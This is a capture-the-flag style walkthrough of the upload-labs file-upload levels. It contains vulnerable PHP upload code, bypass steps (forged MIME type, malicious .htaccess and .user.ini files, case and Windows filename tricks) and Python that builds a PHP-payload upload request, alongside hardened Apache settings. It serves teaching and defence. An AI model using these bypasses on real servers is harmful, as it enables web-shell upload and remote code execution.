
upload-labs (Part 1)

Pass - 01:

1. Try uploading a php file, aaa.php: only certain image types are allowed. Intercept with Burp and notice that the "not allowed" alert pops up before any HTTP request reaches Burp at all. The check therefore lives in the browser, not on the server.

2. Press F12 and look at the JavaScript: checkFile() decides which upload types pass. Add .php to its allow list, delete the function altogether, or disable JavaScript in the browser, then upload again. (Equivalently, send the POST directly with curl or a script; the JS never runs in that case.)

3. Upload succeeds.

Key source code:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("Please select a file to upload!");
        return false;
    }
    // file types allowed for upload
    var allow_ext = ".jpg|.png|.gif";
    // extract the uploaded file's extension
    var ext_name = file.substring(file.lastIndexOf("."));
    // check whether the extension is allowed
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "This file type is not allowed, please upload a " + allow_ext + " file; current type: " + ext_name;
        alert(errMsg);
        return false;
    }
}

(As written the test searches for ext_name followed by "|", so ".gif", the last entry, never matches and is refused too. That is a quirk of the lab, not a security property: any client-side check can be removed by the client.)

Pass - 02:

1. Uploading a php file gives "incorrect file type, please upload again".

2. The source only checks $_FILES['upload_file']['type']. That value is copied from the Content-Type header of the file part inside the multipart body, which the client writes; nothing is derived from the file's bytes. Intercept the upload in Burp Suite and change that part's Content-Type to image/jpeg (image/png or image/gif also pass), leaving the .php filename alone.

3. Upload succeeds, and the file is stored under its original name.

Key source code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'Incorrect file type, please upload again!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}
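Building the request by hand shows why Pass-01 and Pass-02 fall over: the filename and the part's Content-Type are plain strings written by the sender, and PHP copies them into $_FILES without looking at the file's contents. The script below is an added example, not upload-labs code. It assembles the multipart body the lab form would send, parses it back the way the server sees it (the stdlib email parser handles multipart/form-data well enough for this), and replays Pass-02's whole server-side check. The boundary, the "submit" field value and the PHP payload are constructed for the example; send() is the only part that touches the network and is not exercised offline.

```python
"""Added example: a hand-built upload request and the PHP-side view of it."""
import email
import urllib.request

BOUNDARY = "----upload-labs-example"   # arbitrary; must not occur inside the payload
PAYLOAD = b"<?php phpinfo(); ?>"        # constructed stand-in for an uploaded PHP file


def build_upload_body(filename, part_type, payload, boundary=BOUNDARY):
    """multipart/form-data body for the lab form: one file part plus the 'submit' field.

    The part's filename and Content-Type are whatever the sender writes; PHP copies
    them into $_FILES['upload_file']['name'] and ['type'] unchanged.
    """
    b = boundary.encode()
    lines = [
        b"--" + b,
        b'Content-Disposition: form-data; name="upload_file"; filename="' + filename.encode() + b'"',
        b"Content-Type: " + part_type.encode(),
        b"",
        payload,
        b"--" + b,
        b'Content-Disposition: form-data; name="submit"',
        b"",
        b"upload",                      # satisfies isset($_POST['submit'])
        b"--" + b + b"--",
        b"",
    ]
    return b"\r\n".join(lines)


def request_content_type(boundary=BOUNDARY):
    return "multipart/form-data; boundary=" + boundary


def php_view(body, boundary=BOUNDARY):
    """Parse the body back as the server does; returns ($_FILES-like, $_POST-like) dicts."""
    raw = b"Content-Type: " + request_content_type(boundary).encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    files, post = {}, {}
    for part in msg.get_payload():
        field = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True)
        if part.get_filename() is None:
            post[field] = data.decode()
        else:
            files[field] = {
                "name": part.get_filename(),
                "type": part.get_content_type(),   # straight from the part header
                "size": len(data),
                "content": data,
            }
    return files, post


def pass02_accepts(mime):
    """The entirety of Pass-02's server-side check."""
    return mime in ("image/jpeg", "image/png", "image/gif")


def send(url, body):
    """Network call (not run offline): POST the body with the matching boundary header."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": request_content_type()})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    body = build_upload_body("shell.php", "image/jpeg", PAYLOAD)
    files, post = php_view(body)
    print(files["upload_file"]["name"], files["upload_file"]["type"],
          "accepted" if pass02_accepts(files["upload_file"]["type"]) else "rejected")
```

The same body, with the URL of the lab's Pass-02 form, is what Burp forwards after you edit the part's Content-Type; the "type" the server compares is the string you typed, which is why a MIME check on $_FILES[...]['type'] is not a content check. A server that needs to know the file type has to inspect the bytes (magic numbers, an image re-encode) and, separately, control the extension it writes.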

Pass - 03:

1. Uploading a php file fails and the error message names the refused extensions.

2. Upload aaa.php, intercept the request, and change the extension to one that is not on the list, e.g. .php5; forward.

3. Upload succeeds. Note that this level renames the file to date("YmdHis") plus a random number plus the extension, so only the extension survives, and whether .php5 actually executes depends on the server's mapping discussed in the supplement below.

Key source code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//remove trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//strip the string ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'Files with the .asp, .aspx, .php or .jsp extension are not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}

Supplement:

.asp, .aspx, .php and .jsp are refused, but any other extension is accepted, for example .phtml, .phps, .php5, .pht. Whether such a file then runs as PHP is a server matter: Apache only hands a .php5 file to PHP if httpd.conf (or a .htaccess on the path) maps that extension, for example

AddType application/x-httpd-php .php .phtml .phps .php5 .pht

The AddType directive:

Purpose: map one or more filename extensions to a content type.
Syntax: AddType MIME-type extension [extension] ...
MIME-type is the media type assigned to files carrying any of the listed extensions. AddType belongs to mod_mime and works on the type table, i.e. the extension to file-type relationship; with mod_php, the type application/x-httpd-php is what routes a file to the PHP engine. On a PHP-FPM setup PHP is attached with SetHandler (a proxy handler) instead, and an AddType line on its own executes nothing.

.htaccess is not on this blacklist either, but at this level it does not help: the file is stored as date("YmdHis").rand(1000,9999) plus the extension, so it lands as something like 202001011234565678.htaccess, which Apache ignores. The .htaccess route needs a level that keeps the original filename (Pass-04).

Note: a .htaccess file is only honoured when httpd.conf allows it for that directory: AllowOverride All (AllowOverride FileInfo is enough for AddType and SetHandler). mod_rewrite is only needed if the .htaccess itself uses RewriteRule; it is unrelated to whether .htaccess is read at all.

.htaccess is Apache's per-directory configuration file; it applies to the directory it sits in and everything below. Through it one can set 301 redirects, custom 404 pages, extension-to-handler mappings, allow or deny access for particular users or directories, disable directory listings, configure default documents and so on. IIS has no equivalent file. Since Apache 2.4 AllowOverride defaults to None, so unless httpd.conf enables it for the upload directory, an uploaded .htaccess is inert.

Build a .htaccess with the content: AddType application/x-httpd-php .jpg

This tells Apache to parse .jpg files in that directory as PHP, so renaming the PHP file to .jpg gets past the blacklist and still yields execution.
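For reference, the weak server setting that the .htaccess trick depends on, next to a hardened configuration for the same upload directory. This is an added example for Apache 2.4 with mod_php, not part of upload-labs; the path /var/www/html/upload is assumed.

```apacheconf
# Weak: the upload tree honours .htaccess, so an uploaded one can remap
# .jpg (AddType) or every file (SetHandler) to PHP
<Directory "/var/www/html/upload">
    AllowOverride All
</Directory>

# Hardened: .htaccess is ignored, nothing in the tree is executed by PHP,
# and the dangerous names cannot be fetched even if they do get written
<Directory "/var/www/html/upload">
    AllowOverride None
    Options -ExecCGI -Includes -Indexes
    # mod_php only: switch the engine off for this tree (not overridable from .htaccess)
    php_admin_flag engine Off
    # drop handler and type mappings inherited from the server config
    RemoveHandler .php .phtml .phps .php5 .pht
    RemoveType .php .phtml .phps .php5 .pht
    # backstop: refuse to serve script names and config-like names at all
    <FilesMatch "(?i)\.(php[0-9]?|phtml|phps|pht|htaccess|ini)$">
        Require all denied
    </FilesMatch>
</Directory>
```

On a PHP-FPM deployment php_admin_flag is unknown (it is a mod_php directive and Apache refuses to start without the module), so drop that line and instead make sure the server-level FilesMatch/SetHandler that proxies to FPM does not cover this directory; the Require all denied block is the part that still holds either way. RemoveHandler/RemoveType only undo mappings made with AddHandler/AddType, which is why the explicit deny is kept as well.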

Pass - 04:

1. Uploading a php file is refused; the hint shows that most script extensions are now blacklisted.

2. .htaccess is not in the list, and this level stores the file under its original name (UPLOAD_PATH.'/'.$file_name), so the file really does land as .htaccess in the upload directory. Create a file named .htaccess with the content:

SetHandler application/x-httpd-php

3. With mod_php and AllowOverride enabled for the directory, every file in it is now handed to PHP regardless of extension (SetHandler covers all files, unlike AddType which covers the listed extension only). Upload an image shell, e.g. shell.jpg containing PHP, and request it: upload succeeds and the code runs.

Key code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//remove trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//strip the string ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file is not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}

Pass - 05:

1. Uploading a php file fails.

2. Reading the source: .htaccess is now on the blacklist and the extension is lowercased before the comparison, so neither the .htaccess trick from Pass-04 nor a mixed-case extension gets through this code. What the list lacks is .ini, and the file is still stored under its original name. PHP running as CGI/FastCGI reads a per-directory .user.ini (the user_ini.filename setting) from the directory of the requested script, so upload a file named .user.ini containing

auto_prepend_file=shell.jpg

and then upload shell.jpg (PHP code under a .jpg name, which the blacklist allows). Any existing .php file in the upload directory will include shell.jpg before it runs. Prerequisites: PHP as CGI/FastCGI (mod_php ignores .user.ini), at least one .php file in that directory that you can request, and a wait of up to user_ini.cache_ttl (300 seconds by default) before the setting is picked up.

3. Upload succeeds.

Key code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//remove trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//strip the string ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file type is not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}

Pass - 06:

1. Uploading a php file is refused.

2. Reading the source: .htaccess and .ini have been added to the blacklist, the filename is trimmed and its trailing dots removed, but the strtolower() step is gone. in_array() compares case-sensitively and the list only carries a handful of mixed-case spellings (.pHp, .pHp5, .Html ...), so any spelling it does not list, such as .phP or .Php, is accepted. The file is renamed to date+rand plus the extension exactly as submitted, e.g. 202001010000001234.phP. Whether that runs depends on how PHP is attached to Apache: AddType and AddHandler match extensions case-insensitively, so .phP executes; a <FilesMatch "\.php$"> block without (?i) does not match it.

3. Upload succeeds.

Key code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//remove trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//strip the string ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file type is not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}

Pass - 07:

1. Reading the source: compared with Pass-06 the extension is lowercased again and deldot() still removes trailing dots, but the trim() calls on the filename and on the extension are missing. Upload aaa.php with a trailing space ("aaa.php "): the extension ".php " is not in the blacklist, and the file is renamed to date+rand plus ".php ". Windows does not allow a filename to end in a space and silently drops it, so the file lands as date+rand.php. This works only when the server runs on Windows; on Linux the trailing space is kept and the file never matches the PHP handler.

2. Upload succeeds.

Key code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//remove trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//strip the string ::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file is not allowed';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}

Pass - 08:

1. Reading the source: a blacklist again, with trim() applied to both the filename and the extension and ::$DATA stripped, but the deldot() call is gone, so a trailing dot survives. Upload aaa.php. (with a trailing dot): the extension becomes ".php.", which is not in the list. The file is saved under its original name, and Windows does not allow a filename to end in a dot, so it is created as aaa.php.

2. Upload succeeds.

Key code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//strip the string ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file type is not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
} 

Supplement:

Windows filename rules used from Pass-07 onward: a name cannot end in a space or a dot, so Windows silently drops trailing spaces and dots when the file is created ("aaa.php." and "aaa.php " both become aaa.php). In addition, on NTFS the name aaa.php::$DATA denotes the default data stream of aaa.php; when PHP on Windows writes to that path the bytes go into aaa.php and the ::$DATA suffix never appears on disk, while PHP's own string checks still see it as part of the extension unless the code strips it. None of this applies on Linux, where trailing spaces, dots, ':' and '$' are ordinary filename characters.

Pass - 09:

1. Reading the source: trim(), deldot() and strtolower() are all applied, but the str_ireplace('::$DATA', ...) step is missing. On Windows, NTFS reads name::$DATA as the default data stream of name, so writing to aaa.php::$DATA creates aaa.php (see the supplement under Pass-08). Upload aaa.php and change the filename in the request to aaa.php::$DATA: after lowercasing, the extension string is ".php::$data", which is not in the blacklist, and the file is written as date+rand followed by ".php::$data", i.e. date+rand.php on disk (NTFS matches the stream type case-insensitively). Windows only; on Linux ':' and '$' are ordinary characters and the file keeps the whole name.

(Windows is also what the trailing-space, trailing-dot and dot-space-dot tricks rely on, but those only help at levels that keep the original filename: Pass-04, 05, 08 and 10. The levels that rename to date+rand plus the filtered extension reduce "aaa.php. ." to a bare "." extension, so the file lands without any extension. At a renaming level you need a trick that acts on the extension string itself: an unlisted spelling, a trailing space the filter does not trim, or ::$DATA.)

2. Upload succeeds.

Key code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//remove trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file type is not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}

Pass - 10:

Every normalisation from the previous levels is present (trim, deldot, strrchr, strtolower, strip ::$DATA, trim), but each runs exactly once and in that order, and the original filename is kept. Upload "aaa.php. ." (dot, space, dot): trim() changes nothing because the name ends in a dot, deldot() removes that last dot leaving "aaa.php. ", strrchr() returns ". ", and trim() turns it into "." which is not blacklisted. The file is written as "aaa.php. " and Windows drops the trailing dot and space, so it lands as aaa.php. Windows only, as with the other trailing-character tricks.

Key code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//remove trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//strip the string ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file type is not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}
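The eight blacklist levels above differ only in which normalisation is missing and whether the original name is kept, so they are easiest to reason about as one pipeline with switches. The script below is an added example, not upload-labs code: it mirrors the PHP in Python (PHP's trim() character set, strrchr(), the lab's deldot(), case-sensitive in_array() with the lists as printed), then applies an assumed Windows/NTFS name normalisation (trailing dots and spaces dropped, ::$DATA treated as the default stream) and the handler mapping from the AddType line quoted under Pass-03, which mod_mime matches case-insensitively. The STAMP constant stands in for date("YmdHis").rand(1000,9999). Running it prints, per level, which of a fixed set of payload names ends up as something Apache would execute, or as a .htaccess/.user.ini that kept its name; it also shows the point made under Pass-09 that dot-space-dot only survives where the filename is kept, and what changes when the server is not Windows.

```python
"""Added example: the Pass-03 to Pass-10 blacklist filters modelled in Python.

Mirrors the PHP above (trim, deldot, strrchr, strtolower, str_ireplace('::$DATA'),
case-sensitive in_array) and what happens to the chosen name on a Windows/NTFS host.
Not upload-labs code; the NTFS and handler rules below are stated assumptions.
"""
import re

PHP_TRIM = " \t\n\r\0\x0b"        # what PHP's trim() strips by default (note: not dots)
STAMP = "202001010000001234"      # stands in for date("YmdHis").rand(1000,9999)
# extensions Apache hands to PHP under the AddType line quoted in the Pass-03 notes;
# mod_mime compares them case-insensitively
PHP_EXTS = {"php", "phtml", "phps", "php5", "pht"}


def php_trim(s):
    return s.strip(PHP_TRIM)


def deldot(s):
    """upload-labs' deldot(): remove trailing dots only."""
    return s.rstrip(".")


def strrchr_dot(s):
    """PHP strrchr($s, '.'): from the last dot to the end, '' when there is no dot."""
    i = s.rfind(".")
    return s[i:] if i >= 0 else ""


# blacklists as printed on the page; in_array() is case-sensitive, so the few
# mixed-case spellings listed are the only ones caught without strtolower()
DENY_03 = {".asp", ".aspx", ".php", ".jsp"}
BIG = {".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml", ".pht",
       ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".Html", ".Htm", ".pHtml",
       ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml",
       ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml",
       ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer",
       ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf"}
DENY_04 = BIG | {".php1", ".pHp1", ".ini"}      # no .htaccess
DENY_05 = BIG | {".htaccess"}                   # no .ini
DENY_06 = BIG | {".htaccess", ".ini"}           # Pass-06 onwards

# which normalisations each level applies, in the PHP's order, and whether the
# original name (keep=True) or STAMP plus the filtered extension is written
LEVELS = {
    3:  dict(deny=DENY_03, trim_name=True,  deldot=True,  lower=True,  data=True,  trim_ext=True,  keep=False),
    4:  dict(deny=DENY_04, trim_name=True,  deldot=True,  lower=True,  data=True,  trim_ext=True,  keep=True),
    5:  dict(deny=DENY_05, trim_name=True,  deldot=True,  lower=True,  data=True,  trim_ext=True,  keep=True),
    6:  dict(deny=DENY_06, trim_name=True,  deldot=True,  lower=False, data=True,  trim_ext=True,  keep=False),
    7:  dict(deny=DENY_06, trim_name=False, deldot=True,  lower=True,  data=True,  trim_ext=False, keep=False),
    8:  dict(deny=DENY_06, trim_name=True,  deldot=False, lower=True,  data=True,  trim_ext=True,  keep=True),
    9:  dict(deny=DENY_06, trim_name=True,  deldot=True,  lower=True,  data=False, trim_ext=True,  keep=False),
    10: dict(deny=DENY_06, trim_name=True,  deldot=True,  lower=True,  data=True,  trim_ext=True,  keep=True),
}


def server_filter(level, upload_name):
    """Path PHP would pass to move_uploaded_file(), or None when the blacklist rejects it."""
    c = LEVELS[level]
    name = php_trim(upload_name) if c["trim_name"] else upload_name
    if c["deldot"]:
        name = deldot(name)
    ext = strrchr_dot(name)
    if c["lower"]:
        ext = ext.lower()
    if c["data"]:
        ext = re.sub(r"::\$DATA", "", ext, flags=re.IGNORECASE)   # str_ireplace
    if c["trim_ext"]:
        ext = php_trim(ext)
    if ext in c["deny"]:
        return None
    return name if c["keep"] else STAMP + ext


def ntfs_name(path):
    """Assumed Win32/NTFS behaviour: 'x::$DATA' is x's default stream, so the file is x;
    trailing dots and spaces are dropped. On Linux the name is kept verbatim."""
    path = re.sub(r"::\$DATA$", "", path, flags=re.IGNORECASE)
    return path.rstrip(" .")


def on_disk(level, upload_name, windows=True):
    saved = server_filter(level, upload_name)
    if saved is None:
        return None
    return ntfs_name(saved) if windows else saved


def runs_as_php(final_name):
    base, dot, ext = final_name.rpartition(".")
    return dot == "." and ext.lower() in PHP_EXTS


PAYLOADS = ["shell.php", "shell.php5", "shell.phP", "shell.php ", "shell.php.",
            "shell.php::$DATA", "shell.php. .", ".htaccess", ".user.ini"]


def working_payloads(level, windows=True):
    """Payloads that end up as a file Apache would run, or as a config file that kept its name."""
    hits = {}
    for p in PAYLOADS:
        final = on_disk(level, p, windows)
        if final is not None and (runs_as_php(final) or final in (".htaccess", ".user.ini")):
            hits[p] = final
    return hits


if __name__ == "__main__":
    for lvl in LEVELS:
        print(f"Pass-{lvl:02d} (Windows): {working_payloads(lvl)}")
        print(f"Pass-{lvl:02d} (Linux):   {working_payloads(lvl, windows=False)}")
```

Two things fall out of the table that the per-level walkthroughs only hint at. First, the defence that matters most is not the length of the blacklist but renaming: where the server writes STAMP plus the filtered extension, every trick that relies on the filesystem fixing up the name collapses to an extensionless file, and only extension-string tricks (case, untrimmed space, ::$DATA) remain. Second, with windows=False only the case-variation bypass at Pass-06 survives, so the same upload code is a very different target on Linux. A whitelist of allowed extensions plus a server-generated name removes all nine payloads at once.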